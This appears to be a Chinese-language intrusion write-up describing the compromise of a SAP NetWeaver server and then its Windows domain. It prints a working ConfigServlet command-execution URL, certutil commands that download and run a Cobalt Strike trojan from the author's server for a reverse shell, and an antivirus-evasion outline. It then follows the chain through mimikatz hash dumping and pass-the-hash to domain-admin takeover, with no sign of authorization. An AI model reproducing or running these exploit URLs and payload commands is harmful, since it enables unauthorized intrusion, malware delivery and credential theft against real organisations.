此次漏洞的打点方式是Sap Netweaver命令执行漏洞poc为

http://xxxxxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat /etc/passwd

介绍一下什么是NetWeaver

SAP NetWeaver是SAP的集成技术平台，是自从SAP Business Suite以来的所有SAP应用的技术基础。SAP NetWeaver是一个面向服务的应用和集成平台,为SAP的应用提供开发和运行环境，也可以用来和其它应用和系统进行自定义的开发和集成。SAP NetWeaver是使用开放标准和事实上的工业标准进行开发的，可以用Microsoft .NET，Sun Java EE，和IBM WebSphere等这些技术平台进行扩展和互操作。

对网站进行命令执行

可以看到whoami执行成功

然后下一把想到cs生产powershell的payload让它执行，但是考虑到是get传参，可能会超过最大长度就没有尝试，再然后想到windows远程下载自己服务器上的木马然后执行。

certutil -urlcache -split -f http://xx.xx.xx.xx//main.exe

这个main.exe就是我放在xx.xx.xx.xx上的木马，由cs生成

执行

但是cs并未反弹回shell，这里有两种可能，一是目标机器上的防火墙策略设置某些常见协议不能出亡，随尝试DNS，ICMP，HTTP，HTTPS等协议木马，均以失败告终，遂认定有杀软但如下两条命令执行后并未有任何回显

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe

疑问先留下，先搞免杀，免杀是利用恩佬的go免杀生成main.exe，代码我就不贴出来了，懂得都懂，但是原理还是可以分享的，就是利用VituralAlloc 调用虚地址空间， CopyMemory把地址复制eip上执行，其实也算老调重弹了

然后执行http://xxxxxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE= cmd.exe /c certutil -urlcache -split -f http://xx.xx.xx.xx//main.exe

http://xxxxxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE= cmd.exe /c .\main.exe

成功反弹shell

然后就是信息收集了

可以看到用户名是sapservicenpp

然后执行

看到SAP_DAA_GlobalAdmin，说明很可能是管理员权限

然后

可以看到SAP_NPP_GlobalAdmin 果然是admin权限，意味着不用提权，可以直接抓hash，并且有可能可以利用MS14-068

然后就是找主域 net time /domain

ping SKYEAGDC05.skyline.local

net config workstation

Hashdump和mimikaze抓取hash，这里有个要注意的地方是我们需要一直抓hash

，为什么呢，因为你不知道什么时候域管就来登你这台机子了(这台机子为副域控)

最后直接抓到域管hash，然后psh登录域管(注意是skyline.local,不然不行)

发现这样hash传递并不行

随用wmnrm psh成功

拿到域管

经尝试 wmic也可以

查看spn

Hash抓取

完毕,总得来说没什么技术含量，不过能体现抓hash的重要性

然后还留下几个问题 一是抓hash的时候抓到同一个用户名有两个不同的密码

二是在不同的shell上对同一个主机(非主域控，为副域控之)执行net config workstation 得到三个不同的用户，如下图

留下疑问，以后慢慢思考